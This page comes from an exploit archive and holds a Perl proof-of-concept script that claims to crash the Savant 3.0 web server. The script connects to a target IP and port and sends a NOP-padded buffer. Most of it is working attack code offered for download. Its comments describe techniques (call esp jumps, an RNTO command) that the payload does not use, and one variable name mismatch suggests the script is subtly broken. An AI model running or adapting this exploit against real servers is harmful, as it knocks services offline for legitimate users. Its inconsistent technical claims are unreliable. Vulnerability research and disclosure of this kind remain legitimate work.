Savant 3.0 Denial Of Service

Savant 3.0 Denial Of Service: Posted Jan 29, 2024; Authored by Fernando Mengali; Savant version 3.0 remote denial of service exploit.; tags | exploit, remote, denial of service; SHA-256 | e60005b8ed677bf9742ea811348f02b7dda8d14faffbdfb1b36a93601ee596ba; Download | Favorite | View

Savant 3.0 Denial Of Service

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: Savant 3.0 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 27 january 2024
#https://sourceforge.net/projects/savant/files/Savant/3.0/Savant30.exe/download
# Download to demo: https://drive.google.com/file/d/18m_wzC8EOSB8lHPc1DexpOfsDm7H8RFs/view?usp=sharing    
# Notification vendor: No reported
# Tested Version: Savant 3.0 - Denied of Service (DoS)
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The web server does not correctly handle the amount of data or bytes sent to command RNTO.
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

    my $sc = "\x90" x 245;

    my $buf = "\x41\x41" . " /" . $sc."\r\n\r\n";

my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $por, Proto => 'tcp') or exit;
$s->send($buf);
close $s;

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print q {


                            _/|     
                           // o\    
                           || ._)  
                           //__\   
                           )___(   

      [+] Savant 3.0 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

Top Authors In Last 30 Days

Red Hat 343 files
Ubuntu 57 files
Gentoo 32 files
Debian 22 files
Apple 9 files
malvuln 6 files
Jann Horn 5 files
Google Security Research 5 files
nu11secur1ty 5 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,044)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,776)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,910)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,514)
UNIX (9,404)
UnixWare (187)
Windows (6,660)
Other

Savant 3.0 Denial Of Service

Savant 3.0 Denial Of Service

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Savant 3.0 Denial Of Service

Share This

Savant 3.0 Denial Of Service

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems